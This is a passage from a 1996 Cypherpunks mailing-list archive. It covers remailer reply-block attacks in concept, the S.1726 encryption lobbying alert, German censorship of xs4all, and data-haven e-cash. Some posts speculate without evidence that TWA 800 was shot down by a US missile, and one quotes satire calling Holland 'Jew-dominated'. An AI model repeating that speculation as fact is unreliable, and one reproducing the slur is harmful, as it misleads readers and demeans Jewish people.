enought to allow a good trace (no more than 5 in existence at any one time). They would probably need to be managed by some kind of nym-server. They have the disadvantage of allowing denial of service by simply using up all the available reply blocks. The block also point back to the sender (as all reply blocks must). This allows an attack to rubber hose each operator in succession at the attacker's leasure. Normal chains contain no information about where they have been, so interception and cooperation must happen in real time (much more difficult). The other solution is message pools. I think this will turn out to be the only really secure and reliable system. Some sort of automated use of pools by remailers (so the user need not do so directly) might be possible. I designed such a system several months back, with little response. At 4:50 PM -0700 9/2/96, Timothy C. May wrote: >This type of attack is why "reply-block" schemes are fundamentally flawed. >Any such scheme gives an attacker (a traffic analyst) a wedge with which to >deduce mappings. It is a kind of "chosen plaintext" attack (loosely >speaking). Or a "forcing attack." Maybe a "flooding attack" is as good a >name as any. One floods the reply block and simply watches where the water >goes. > >(If there were more academics in the crypto community looking at digital >mix issues, there would likely be clever names for the various attacks.) > >Several folks on this list, including (from memory), Scott Collins, Wei >Dai, Hal Finney, myself, and others, have noted this weakness over the >years. > >Note that merely fiddling around with probabilities of transmission, such >as described above, will not be enough. This just adds a layer of noise, >which will disappear under a correlation analysis. > >(For newcomers, there are interesting parallels between statistical >analysis of ciphers and similar analysis of remailer networks. And lots of >statistical tools can be used to deduce likely mappings based on >source/sink correlations, digram analysis, etc. Making a remailer network >robust against such analyses will take a whole more basic thinking. Merely >increasing message volume is not enough. Nor is increasing latency enough. >Generally speaking, of course.) > >Instead of reply blocks, I think use of message pools (a la BlackNet) is a >more robust reply method, as it uses "widely-distributed messages" (a la >Usenet newsgroups) to get around the source/sink correlation issue. > >--Tim May > > >We got computers, we're tapping phone lines, I know that that ain't allowed. >---------:---------:---------:---------:---------:---------:---------:---- >Timothy C. May | Crypto Anarchy: encryption, digital money, >tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero >W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, >Licensed Ontologist | black markets, collapse of governments. >"National borders aren't even speed bumps on the information superhighway." ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From frantz at netcom.com Mon Sep 9 02:02:44 1996 From: frantz at netcom.com (Bill Frantz) Date: Mon, 9 Sep 1996 17:02:44 +0800 Subject: Erasing Disks, was Re: What the NSA is patenting Message-ID: <199609090702.AAA12702@netcom6.netcom.com> See Peter Gutmann's paper, "Secure Deletion of Data from Magnetic and Solid-State Memory" in The Sixth USENIX Security Symposium Proceedings. My feeling after hearing his paper was that the only thing I would trust was thermite. ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From shabbir at vtw.org Mon Sep 9 02:33:46 1996 From: shabbir at vtw.org (Voters Telecommunications Watch) Date: Mon, 9 Sep 1996 17:33:46 +0800 Subject: ALERT: Call the Commerce committee to protect your privacy! (9/7/96) Message-ID: <199609090211.WAA13794@panix3.panix.com> ======================================================================== SENATE COMMERCE COMMITTEE SCHEDULED TO VOTE ON PRO-PRIVACY ENCRYPTION LEGISLATION (S.1726) ON THU SEPTEMBER 12, 1996 YOUR HELP IS NEEDED TO ENSURE PASSAGE CALL THE COMMERCE COMMITTEE (PHONE NUMBERS BELOW) September 8, 1996 Please widely redistribute this document with this banner intact until September 30, 1996 ________________________________________________________________________ CONTENTS The Latest News What You Can Do Now Background / What To Expect This Week Description of S.1726, Pro-CODE Bill Chronology of Pro-Crypto Legislation For More Information / Supporting Organizations ________________________________________________________________________ THE LATEST NEWS On Thursday September 12, the Senate Commerce Committee is set to vote on legislation designed to enhance privacy and security on the Internet. The bill, known as the "Promotion of Commerce Online in the Digital Era (Pro-CODE) Act," (S. 1726) is the best hope yet for real reform of U.S. encryption policy, and its passage by the Commerce Committee would signify a critical step forward in the struggle for privacy and security in the Information Age. The bill faces significant opposition from the Clinton Administration, who continues to cling to a cold-war era view of U.S. encryption policy. IT IS ESSENTIAL THAT THE COMMERCE COMMITTEE HEAR FROM SUPPORTERS OF PRIVACY AND SECURITY ON THE INTERNET. Please take a moment to contact the committee by following the simple instructions below. ________________________________________________________________________ WHAT YOU CAN DO NOW It's crucial that you call the Commerce committee members below and urge them to pass S.1726 out of committee without amendments. (This is also known as a "clean" bill.) Any opportunity for amendments (even if they are good) opens us up to the possibility of hostile amendments that could restrict the use of encryption even further than today's abysmal state. It could even prohibit the use of encryption without Clipper Chip-like key 'escrow' technology, which includes built-in surveillance and monitoring functionality. 1. Call/Fax the members of the Senate Commerce committee and urge them to pass S.1726 out of committee "cleanly". Do not use email, as it is not likely to be looked at in time to make a difference for the markup on September 12th. Use the sample communique and directory listing below to make it a simple TWO MINUTE task. 2. Sign the petition to support strong encryption at http://www.crypto.com/petition/ ! Join other cyber-heroes as Phil Zimmermann, Matt Blaze, Bruce Schneier, Vince Cate, Phil Karn, and others who have also signed. 3. Between now and Wed. September 12, it is crucial that you call all these members of Congress. P ST Name and Address Phone Fax = == ======================== ============== ============== D SC Hollings, Ernest F. 1-202-224-6121 1-202-224-4293 D MA Kerry, John F. 1-202-224-2742 1-202-224-8525 D HI Inouye, Daniel K. 1-202-224-3934 1-202-224-6747 D KY Ford, Wendell H. 1-202-224-4343 1-202-224-0046 D WV Rockefeller, John D. 1-202-224-6472 na D LA Breaux, John B. 1-202-224-4623 na D NV Bryan, Richard H. 1-202-224-6244 1-202-224-1867 D ND Dorgan, Byron L. 1-202-224-2551 1-202-224-1193 D NE Exon, J. J. 1-202-224-4224 1-202-224-5213 D OR Wyden, Ron* 1-202-224-5244 1-202-228-2717 R SD Pressler, Larry* 1-202-224-5842 1-202-224-1259 R MT Burns, Conrad R.(*sponsor) 1-202-224-2644 1-202-224-8594 R AK Stevens, Ted 1-202-224-3004 1-202-224-2354 R AZ McCain, John 1-202-224-2235 1-202-224-2862 R WA Gorton, Slade 1-202-224-3441 1-202-224-9393 R MS Lott, Trent* 1-202-224-6253 1-202-224-2262 R TX Hutchison, Kay Bailey 1-202-224-5922 1-202-224-0776 R ME Snowe, Olympia 1-202-224-5344 1-202-224-6853 R MO Ashcroft, John* 1-202-224-6154 na R TN Frist, Bill 1-202-224-3344 1-202-224-8062 R MI Abraham, Spencer 1-202-224-4822 1-202-224-8834 * supporter or cosponsor. The bill also enjoys broad bi-partisan support from members not on the committee including Senators Leahy (D-VT) and Murray (D-WA). 4. Here is a sample conversation: SAMPLE PHONE CALL You: Sen:Hello, Senator Mojo's office! You: SAY I'm calling to urge the Senator to pass S.1726, the THIS-> Burns/Leahy/Pressler bill, S.1726 when the committee votes on it on Thursday. It's critical to the future of privacy, security, and electronic commerce on the internet. Sen:Ok, thanks! IF THEY SAY "The Senator has concerns about the bill", please answer, "Please try to work these issues out as it moves to the Senate floor, but passage out of committee will send an important signal to the Administration." 5. To help us measure the effectiveness of the campaign, WE NEED TO HEAR FROM YOU. Please tell us who you called, and how they sounded. We'll be passing this information to folks in D.C. who can help apply pressure where needed. $ Mail vtw at vtw.org Subject: I called so-and-so Hey, I called Sen. Mojo. He sounded iffy, call in the reinforcements. ^D 6. Forward this to your friends and colleagues in appropriate forums until the date of expiration at the top. Forward a copy of this to your Internet Service Provider as well, and ask them to put the following text in their message of the day (motd), or on their WWW page: ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT The U.S. Senate will be voting on a proposal to encourage better security on the Internet on Thu Sep. 12th. Your help is needed to call Congress. See http://www.crypto.com/ for more details. ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ________________________________________________________________________ BACKGROUND / WHAT TO EXPECT THIS WEEK For the past 3 years, Cyber-Rights Activists, citizens, and industry leaders have been working hard to reform US encryption policy. Support has been building behind several legislative proposals this year because they send a clear signal to the Administration about the need for security and privacy in the Information Age. The digital revolution is currently being held hostage by the White House's Cold War restrictions on privacy-enhancing encryption technology. Now, with Congress less than a month away from adjournment, everyone who supports encryption and privacy is working to see this bill leave committee in order to send a clear message to the White House that they are on the wrong side of the encryption issue. Although this bill may not become law this year, its passage out of committee will be a landmark event that will clearly tell the White House that the Congress, the public, and the computer industry care about security and privacy, and need strong, reliable encryption technology in order to make the Internet a viable platform for commerce, education, and democracy. Success for our side is not certain, and the next week is not without risks. On September 12th, the Senate Commerce committee will hold a "markup", where the bill is examined, voted on, and if there are enough votes, passed out of committee. Two things could happen: -the committee could pass the bill as written, -the committee could pass the bill with amendments. Any amendments are not likely to be friendly, and in particular, quiet sources have told privacy activists that the Clinton Administration has been readying a legislative assault on your right to use encryption for several weeks now. A Clipper-like amendment could be attached to the bill if our side does not have enough votes to block all amendments. It is crucial that all netizens who consider privacy and security important take a moment to call members of the Commerce Committee right now and urge them to vote S.1726 out of committee without amendments. ________________________________________________________________________ DESCRIPTION OF S.1726, PRO-CODE BILL Privacy-enhancing encryption technology is currently under heavy restrictions kept in place by the White House. Encryption that is currently allowed to be exported is not sufficient to protect confidential information. This policy acquires an "Alice-in-Wonderland" quality when one realizes that strong encryption products are available abroad both for sale and for free download off the Internet. The Pro-CODE Act resolves to: 1. Allow for the *unrestricted* export of "mass-market" or "public-domain" encryption programs, including such products as Pretty Good Privacy and popular World Wide Web browsers. 2. Requires the Secretary of Commerce to allow the less restricted export of other encryption technologies if products of similar strength are generally available outside the United States, roughly up to DES strength. 3. Prohibits the federal government from imposing mandatory key-escrow encryption policies on the domestic market and limiting the authority of the Secretary of Commerce to set standards for encryption products. ________________________________________________________________________ CHRONOLOGY OF PRO-CRYPTO LEGISLATION 9/12/96 (scheduled) Senate Commerce committee will hold markup of S.1726 and hopefully pass it out of committee with no amendments. 7/25/96: Full Senate Commerce committee holds positive hearings on S.1726. FBI Director Louis Freeh testifies along with many cyber-luminaries. Hearings are cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com. You can see the photos, read the testimony, and listen to the audio transcript at http://www.crypto.com/events/072596/ 6/26/96: Senate subcommittee holds positive hearings on S.1726. Hearings are cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com. You can see the photos, read the testimony, and listen to the audio transcript at http://www.crypto.com/events/062696/ 5/2/96: Bi-partisan group of Senators introduce Pro-CODE Act, which would free public-domain encryption software (such as PGP) for export, free much commercial encryption for export, and reduce the government's ability to push Clipper proposals down the throats of an unwilling public. Original sponsors include: Senators Burns (R-MT), Dole (R-KS), Faircloth (R-NC), Leahy (D-VT), Murray (D-WA), Pressler (R-SD), and Wyden (D-OR). 3/5/96: Sen. Leahy (D-VT) and Rep. Goodlatte (R-VA) announce encryption bills (S.1587/H.R.3011) that significantly relax export restrictions on products with encryption functionality in them, as well as free public domain software such as PGP (Pretty Good Privacy). ________________________________________________________________________ FOR MORE INFORMATION / SUPPORTING ORGANIZATIONS There are many excellent resources online to get up to speed on crypto including the following WWW sites: http://www.crypto.com http://www.privacy.org http://www.eff.org http://www.cdt.org http://www.epic.org http://www.vtw.org Please visit them often. The following organizations have signed onto this alert: Center for Democracy and Technology Electronic Frontier Foundation Electronic Privacy Information Center Voters Telecommunications Watch ________________________________________________________________________ End alert ======================================================================== From weber at iez.com Mon Sep 9 03:21:47 1996 From: weber at iez.com (Rolf Weber) Date: Mon, 9 Sep 1996 18:21:47 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL In-Reply-To: Message-ID: <9609090806.AA12867@spibm02> > > Though my German friends will perhaps feel I am picking on them, this is > not so (this week Germany is in the hot seat, last week it was > Singapore....). > ...the week before it was china. > > * as Germany is bent on blocking sites which carry this subversive > pamphlet, "Radikal," let us mirror it on thousands of sites around the > world. > yes, please do. > > * wouldn't it be deliciously ironic if the "Free Speech Blue Ribbon" now > attached to so many pages were to be joined by a "Star of David"? This Star > of David symbol could mean "We support freedom to read, and our site > contains the "Radikal" publication which Germans are forbidden to access." > no, please don't. there are millions of germans besides bundesanwaltschaft. rolf -- ----------------------------------------- Rolf Weber | All I ask is a chance IEZ AG D-64625 Bensheim | to prove that money ++49-6251-1309-109 | can't make me happy. From weber at iez.com Mon Sep 9 03:43:26 1996 From: weber at iez.com (Rolf Weber) Date: Mon, 9 Sep 1996 18:43:26 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL In-Reply-To: <199609070035.CAA06972@basement.replay.com> Message-ID: <9609090809.AA16205@spibm02> > > [It just says to live radically, and to read "radikal". But > "radikal" is a terrorist magazine after all.] > no, "radikal" isn't a terrorist magazine. it's just ridiculous kiddy stuff. rolf -- ----------------------------------------- Rolf Weber | All I ask is a chance IEZ AG D-64625 Bensheim | to prove that money ++49-6251-1309-109 | can't make me happy. From dougr at skypoint-gw.globelle.com Mon Sep 9 03:52:32 1996 From: dougr at skypoint-gw.globelle.com (Douglas B. Renner) Date: Mon, 9 Sep 1996 18:52:32 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: <323227A1.C1B@gte.net> Message-ID: Okay, I'm not paranoid, but I *do* see that something's fishy. How come the whitehouse Chief of Staff announces just a few days after the explosion that an explosive chemical residue was found, and then -- the whitehouse distances itself from his report?!?! Supposedly now, we're hearing that the early tests were ruled "inconclusive". Hmmmm. I'm curious what criteria determines whether or not a test can be considered "conclusive". Might political volatility have something to do with it? The US has our best men working on this - they are professionals. Of course if an early test came up positive, they would devote all necessary resources at the highest priority to investigate that angle completely, and immediately clear up any doubts about the validity of the test in question. For this reason, I can't swallow that "they didn't know" about the chemical residue until recently. Especially with the Chief of Staff's early remarks. We've been told since day one that this investigation were being handled "as if it were a crime." In my mind, I've been hoping that this might shed some positive light on the contradictory signals we're being fed. Although it's pretty clear they're definitely withholding information, it just _might_ be that this is being done in a fashion intended to help with the investigation. Remember the World Trade Center investigation? They knew immediately what type of vehicle the blast was in - but they deliberately gave false information to the media. They said they were looking into a blue stationwagon or some such BS, and the culprits believed it! Federal agents staked out the rental agency where the _van_ was rented from and caught one of the buggers, who thought the investigation was way off track. Yes!!! In other words, I'm willing to wait patiently for the truth to come out, if the professionals in charge deem it advantageous for the course of the investigation. Of course the NTSB is behaving like a puppet. I'm sure the Navy & FBI can do a much better job at the investigation than the NTSB could ever hope to do. This is as it should be. But if we find out *AFTER* the presidential election that it was friendly fire which downed TWA 800, then... words fail me regarding such a scenario. (FYI One witness described hearing "a sonic boom" (which is consistent with the supersonic flight of a missile.) It is significant that he described it as a sonic boom. He described first hearing it, then looking up to witness the explosion. He was interrogated at length about this detail, since as with lightning, the sound should have followed the explosion by several seconds. Unless of course, it was a true sonic boom caused by a missile on its way up to the plane. Recall the other reports of "streaks of light" leading up to and hitting the plane. Hmm!!!) ObCrypto: Learning the truth about the government's use of the media, especially regarding when & how we are manipulated, can tell us _much_ about the relevancy of crypto in our daily lives. In particular, learning the truth is a skill we cannot allow to atrophy if this is the same political entity which seeks to implement key escrow. I say, the thread is relevant. Fortunately this forum reaches some of the most intelligent and well-informed minds on the net. From molnard1 at nevada.edu Mon Sep 9 04:10:00 1996 From: molnard1 at nevada.edu (DAVID A MOLNAR) Date: Mon, 9 Sep 1996 19:10:00 +0800 Subject: Conservation Laws, Money, Engines, and Ontology In-Reply-To: <199609090401.VAA26172@dns2.noc.best.net> Message-ID: On Sun, 8 Sep 1996, Greg Kucharo wrote: > Here's where reputations could come in. You cound't open a new account > anywhere without a good "reputation". This could aid in balancing the load > of certain people. Hey, if we're going to do that, why not go all the way and imagine a "virtuous society" in which e-cash is based on reputation. In order to obtain v$, one must submit to a "reputation asessment" by one of several firms, which then issue a given amount of v-cash based on their findings. An ISP simply requires an arbitrary amount of v-cash along with the usual $$ every month. At the end of the month, your friendly Moral Monitor greps thru Usenet and all the mailing lists he monitors looking for your name, then adjusts your account accordingly. Different moral codes would have different agencies. :-) For this service, of course, you pay a modest fee. But it's a small price to pay for spiritual peace of mind. Perhaps we'd see the rise of reputation constultants in such a system. How about people with such large "fortunes" that they create wealth simply by being associated with someone else? Don't forget the block meetings. :-> -David Molnar Phil Dick is dead, alas... From schmidt at pin.de Mon Sep 9 04:16:13 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Mon, 9 Sep 1996 19:16:13 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL In-Reply-To: <2.2.32.19960908184651.00ac63d4@vertexgroup.com> Message-ID: September 9th, I _can_ _access_ www.xs4all.nl _from_ _inside_ _Germany_. -stephan PS: using 3 different routes (accounts). From molnard1 at nevada.edu Mon Sep 9 04:29:39 1996 From: molnard1 at nevada.edu (DAVID A MOLNAR) Date: Mon, 9 Sep 1996 19:29:39 +0800 Subject: Distributed data haven monetary supply? Message-ID: When writing about Eternity services or other distributed data havens, one has to cover the issue of cost. After all, it takes some expenditure of resources to store data, which can translate to actual $$ (or riyals or dinar or kroner or whatever). So far that I've seen, the problem of delivering that payment has been put down to "e-cash payment" of some kind (hopefully untraceable), or creative wire transfer. In both cases, we end up needing to implement e-cash on a wide-scale basis, or completely reforming the way banks work in most countries. After all that trouble, then, our value is still stored in terms of a real currency. What if a node in a data haven could issue its own certificates/money for goods/services? The idea seems similar to me to the "TrustBucks" discussed recently on the list. A node's operator issues credits to others in exchange for money, favors, or space on their own machines. However, if every node issues its own currency, but only to those it trusts, we have the same problem as w/PGP...there is no guarantee that data may flow freely from node to node, which invites weakness. It's also an open invitation to inflation, as each operator may mint many billions of $ w/o immediate consequences (perhaps combined w/spam in a misguided publicity attempt?) Question : would it be preferable for a group of nodes to issue e-cash? I'm thinking in terms of a system where the bank's secret key is split between the participating nodes (or a certain voting subset), with a certain threshold needed to mint new currency. If there are several such constallations (and methods of exchanging currency between them), it multiplies the number of points one must subvert in order to manipulate the system. Perhaps groupings might agree to share stored data freely between nodes in the interests of security. A user then has several different "economies" to choose from, each of which has different policies. Once a data haven begins to devrive actual _income_ or benefit from these transactions, its attitude toward economic policy may affect its ability to secure and retreive data on command. A rich haven, for instance, may be able to afford better bandwidth between nodes, or funding for research into distributed computing. In contrast, a "poor" haven may suffer from outdated equipment, hardware failures, and possibly intermittent loss of data. Of course, such effects will not be particularly pronounced so long as a data haven is largely a volunteer effort. If a haven were to evolve into a socially stronger entity, with clearly defined "rights" and "responsibilities" for nodes, then its policies would have greater effect. I do not see a guarantee that such a structure would be anarchic in nature, even though the technology itself is amenable. Y'know, a group currency could prove to be a powerful tool to assert dominance/influence over a single node, much as we may speak about "dollar zones" or "yen blocs" in the real world. Gridlock might also be a problem...what if the system is set up to demand unanimous consent, but one of the nodes just died? How does one cast out a node or add a new one without collecting the bank's key in one place? What's to stop me from adding myself as a node under 15 assumed names? My concern is that these fears might engender the kind of 3l33t mindset sometimes seen on really lame wAR3z BBSs : a small power group, intense distrust of outsiders, almost cultish fac,ade of devotion to said small power group, et. al. None of which is helpful. Comments? Is it a good idea, or will it lead to ever-more confusion? Sorry if this is a bit long, repetitive of other things previously discussed to death elsewhere, or rambling. :-) -David Molnar From schmidt at pin.de Mon Sep 9 04:31:35 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Mon, 9 Sep 1996 19:31:35 +0800 Subject: [WAS xs4all.nl] Terrorists In-Reply-To: Message-ID: One thought : How many of you would support terrorist web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? -stephan From gary at systemics.com Mon Sep 9 05:05:55 1996 From: gary at systemics.com (Gary Howland) Date: Mon, 9 Sep 1996 20:05:55 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: Message-ID: <3233E582.FF6D5DF@systemics.com> Enzo Michelangeli wrote: > > On Sat, 7 Sep 1996, Hallam-Baker wrote: > > > There is a massive difference between anonymous speech and anonymous > > transactions. Anonymous speech can create problems (defamation etc.) > > but in the main these are not problems the courts are particularly > > good at dealing with. > > Perhaps, but defamation is an issue that can't be ignored either, > especially if one tries to build systems based on reputation. It _is_ an issue that can be ignored - if the "defamer" backs up his claims, then fine, the claims can be shown to be valid, otherwise ignore those claims. Simple. Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From enzo at ima.com Mon Sep 9 05:34:17 1996 From: enzo at ima.com (Enzo Michelangeli) Date: Mon, 9 Sep 1996 20:34:17 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: <3233E582.FF6D5DF@systemics.com> Message-ID: On Mon, 9 Sep 1996, Gary Howland wrote: > Enzo Michelangeli wrote: > > > Perhaps, but defamation is an issue that can't be ignored either, > > especially if one tries to build systems based on reputation. > > It _is_ an issue that can be ignored - if the "defamer" backs up his > claims, then fine, the claims can be shown to be valid, otherwise ignore > those claims. Simple. I and you may well choose to do so, but the vast majority of the human beings believe just anything that is repeated loud and long enough. Otherwise, nobody would hire PR and pay for advertisement, politicians wouln't be fedwith taxpayer's money, Bosnians would trade goods instead of gunshots, etc. I'm personally not interested in conjuring up the latest utopia for a minoritarian sect of illuminati: I need to live in the real world, and push for viable solutions that change it for better, now. Enzo From schmidt at pin.de Mon Sep 9 07:00:40 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Mon, 9 Sep 1996 22:00:40 +0800 Subject: ... subversive leftists In-Reply-To: Message-ID: I hope this one was ironic. > The Democratic People's German Reich is fully justified in cutting off > contacts with subversive radical publications in Jew-dominated nations like > Holland. > > As Reichskommander Schmidt points out: "The citizen-units who access ^^^^^^^^^^^^^^^^^^^^^^^ But this one is tasteless and insulting even if it was meant ironic. -stephan From vince at offshore.com.ai Mon Sep 9 07:26:00 1996 From: vince at offshore.com.ai (Vincent Cate) Date: Mon, 9 Sep 1996 22:26:00 +0800 Subject: TWA 800 - hit by an unarmed US missile? In-Reply-To: Message-ID: A collision with an unarmed missile would explain why they are not finding much evidence of high explosives (the pitting, ruptured metal, and residue). If a missile going at supersonic speed hit a 747 in the underbelly, near a fuel tank, I sure believe that it could take out the 747. If it was coming toward the 747, not catching up to it from behind, the collision speed would be the addition of the two speeds. In this case a soft civilian airplane would not stand a chance. Civilian airplanes are designed to survive collisions with birds, but not supersonic missiles. If the Navy was firing missiles in this area, it really does seem like the press should be checking out this angle. -- Vince From jonl at well.com Mon Sep 9 07:33:39 1996 From: jonl at well.com (Jon Lebkowsky) Date: Mon, 9 Sep 1996 22:33:39 +0800 Subject: [WAS xs4all.nl] Terrorists Message-ID: <2.2.32.19960909115015.0070caf0@mail.well.com> At 11:01 AM 9/9/96 +0200, Stephan Schmidt wrote: >One thought : How many of you would support terrorist >web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? I.e. "How many of you support the right to free speech regardless of content." Wellll...there is the rule about speech which endangers; "fire in a crowded theatre" is the cliche-example. What could a terrorist SAY that would endanger? Personally, I'd rather have terrorists building html than bombs. -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From jonl at well.com Mon Sep 9 07:59:16 1996 From: jonl at well.com (Jon Lebkowsky) Date: Mon, 9 Sep 1996 22:59:16 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi Message-ID: <2.2.32.19960909114613.006ec718@mail.well.com> At 06:04 PM 9/9/96 +0800, Enzo Michelangeli wrote: >On Mon, 9 Sep 1996, Gary Howland wrote: > >> Enzo Michelangeli wrote: >> >> > Perhaps, but defamation is an issue that can't be ignored either, >> > especially if one tries to build systems based on reputation. >> >> It _is_ an issue that can be ignored - if the "defamer" backs up his >> claims, then fine, the claims can be shown to be valid, otherwise ignore >> those claims. Simple. > >I and you may well choose to do so, but the vast majority of the human >beings believe just anything that is repeated loud and long enough. >Otherwise, nobody would hire PR and pay for advertisement, politicians >wouln't be fedwith taxpayer's money, Bosnians would trade goods instead >of gunshots, etc. I'm personally not interested in conjuring up the latest >utopia for a minoritarian sect of illuminati: I need to live in the real >world, and push for viable solutions that change it for better, now. > >Enzo One viable solution you can push for: educate the 'vast majority' to understand that these wordstreams have no mojo, that skepticism is a surivival skill in the 'Information Age.' -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From schmidt at pin.de Mon Sep 9 08:20:06 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Mon, 9 Sep 1996 23:20:06 +0800 Subject: [WAS xs4all.nl] Terrorists In-Reply-To: <2.2.32.19960909115015.0070caf0@mail.well.com> Message-ID: > Wellll...there is the rule about speech which endangers; "fire in a crowded > theatre" is the cliche-example. What could a terrorist SAY that would > endanger? Hmm most groups gain support and new members ('followers') by 'words'. (Although some may get that by their actions.) > Personally, I'd rather have terrorists building html than bombs. Yep, me too, but .... -stephan From enzo at ima.com Mon Sep 9 08:20:57 1996 From: enzo at ima.com (Enzo Michelangeli) Date: Mon, 9 Sep 1996 23:20:57 +0800 Subject: Encourage Singapore To Come Out Of the Stone Age In-Reply-To: <199609081635.JAA05916@dns1.noc.best.net> Message-ID: On Sat, 7 Sep 1996, James A. Donald wrote: > At 12:39 PM 9/3/96 +0800, Enzo Michelangeli wrote: > > The idea that rights and values can be "natural" is contradicted by > > several thousand years of history, during which absolutism or downright > > tyranny have been well more common than freedom. > > The existence of foot binding in China is not evidence that women's > feet have no particular natural shape. Sure, but that was a particular case in the history, not the rule. > > The success of that misleading view in America, and by extension in most > > of the western countries, is largely due to the unfortunate influence of > > [...] > > When one engineers bridge, designed according to one theory of > materials physics, stands up, and another engineers bridge, designed > according to a different theory of material physics, falls > down, does that not suggest that the first engineer knows > what he is talking about, and the second engineer does not? Absolutely: but here the two theories are market economy vs socialism, not political freedom vs. lack of it. > > In the real world, freedom is a by-product of a materially prosperous > > society (which is why capitalism generally produces free societies, but > > socialism does not). > > First, you have this completely the wrong way around: Prosperity is > the product of a free society. For example when the Dutch revolted > from Spain, they were at first poorer than spain. > > Secondly there is ample counter evidence: For example in America > before the european conquest, some Indian societies were extremely > free and others, such as the Incas, had institutions very similar to > modern totalitarianism, yet their material level was very different > to today's, and not very different from each others. > > Again the Germanic tribes that conquered England had very high levels > of liberty, yet were terribly poor, and the Icelanders of Saga period > Iceland were very free, yet very poor. ^^^^^^^^^^^^^^^^^^^^^^^^ Er, methinks that those examples strenghten more my thesis than yours: if liberty alone could bring prosperity, how would do you explain the cases of those free-but-poor? In any case, I would stick to periods for which there are reliable written documents and provable evidence, or else we'll end up believing that faith in God may split sea waters, and wars start because of an unfaithful bride. And I can give you plenty of counter-examples where, instead, industrialization, modern techniques and, crucially, open markets have brought prosperity to politically totalitarian countries that, *subsequently*, have developed more open institutions: Taiwan and Korea, until recently, were more or less ugly fascist dictatorships. China's GDP, since they ditched communism in favor of capit... er, "market socialism", has grown on average about 10% a year: I believe that in 10 or 20 years the consequent increase in education and public awareness will force some form of political liberalization as well (but don't forget that their per-capita GDP is still 30 times lower than Hong Kong's and 10 times tha Taiwan's). Regarding the Habsburg Netherlands, that was very clearly a case of rebellion for economic independence (not unlike the Boston Tea Party, OTOH), and, before that, those provinces witnessed the birth of two modern financial instruments: the tradeable government securities tied to the excise and property tax imposed by Charles V in 1542, and, a few years later in Antwerp, the negotiable international bill of exchange. > > Trying to build a free society by screaming loud > > what the "natural" rights are supposed to be, has no better chances of > > success than [...] > > Succeeded the last two times it was tried. It succeeded where and when liberty symbiosed with capitalism, and failed otherwise. Enzo From declan at eff.org Mon Sep 9 08:58:37 1996 From: declan at eff.org (Declan McCullagh) Date: Mon, 9 Sep 1996 23:58:37 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL In-Reply-To: Message-ID: Not having any accounts inside Germany, I can only say what I hear from the folks running xs4all, which is that only some ISPs have complied. -Declan On Mon, 9 Sep 1996, Stephan Schmidt wrote: > > September 9th, > > I _can_ _access_ www.xs4all.nl _from_ _inside_ _Germany_. > > -stephan > > PS: using 3 different routes (accounts). > > // declan at eff.org // I do not represent the EFF // declan at well.com // From dlv at bwalk.dm.com Mon Sep 9 08:58:55 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 9 Sep 1996 23:58:55 +0800 Subject: [WAS xs4all.nl] Terrorists In-Reply-To: Message-ID: Stephan Schmidt writes: > One thought : How many of you would support terrorist > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? http://www.terrorist.org ? --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Mon Sep 9 09:35:08 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 10 Sep 1996 00:35:08 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: Message-ID: <56mZTD63w165w@bwalk.dm.com> "Douglas B. Renner" writes: > with the investigation. Remember the World Trade Center investigation? > They knew immediately what type of vehicle the blast was in - but they > deliberately gave false information to the media. They said they were > looking into a blue stationwagon or some such BS, and the culprits believed > it! Federal agents staked out the rental agency where the _van_ was rented > from and caught one of the buggers, who thought the investigation was way > off track. Yes!!! I recall that the perp rented the vehicle and gave a $400 cash deposit. He subsequently returned to the rental agency, stated that the vehicle was stolen, and demanded his cash back. And the Oklahoma City perp was caught speeding with no licence plates. Shit. Whoever recruits those terrorists needs a better h.r. department to screen for stupidity. :-) > thread is relevant. Fortunately 